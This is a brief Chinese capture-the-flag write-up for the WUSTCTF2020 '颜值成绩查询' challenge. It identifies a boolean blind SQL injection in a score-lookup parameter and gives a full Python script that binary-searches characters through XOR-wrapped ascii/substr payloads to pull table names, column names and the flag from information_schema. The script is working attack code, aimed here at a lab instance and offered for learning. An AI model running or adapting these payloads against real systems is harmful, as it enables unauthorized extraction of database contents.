[WUSTCTF2020]颜值成绩查询

知识点

• 布尔盲注

 

• 输入1 成绩100
• 输入2 成绩666
• 输入2-1 成绩100

判断为布尔型数字盲注

贴一下脚本

# -*- coding: utf-8 -*-
#version:python3.8
import requests
import time

url = "http://c63ca819-4d56-490f-b4ca-11c9a3e45706.node3.buuoj.cn/?stunum=1"
res = ''
for i in range(1,50):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:        
        #payload = "^(ascii(substr(database(),{},1))>{})".format(i,mid)
        #payload = "^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctf'),{},1))>{})".format(i,mid)
        #payload = "^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='flag'),{},1))>{})".format(i,mid)
        payload = "^(ascii(substr((select(value)from(flag)),{},1))>{})".format(i,mid)
        r = requests.get(url=url+payload)
        if r.status_code == 429:
            print('too fast')
            time.sleep(1)
        if 'Hi admin, your score is: 100' not in r.text:
            left = mid + 1
        elif 'Hi admin, your score is: 100'  in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    if mid == 31 or mid == 127:
        break    
    res += chr(mid)
    print(str(mid),res)
#库名 ctf 
#表名 flag,score
#flag表中的列名 flag,value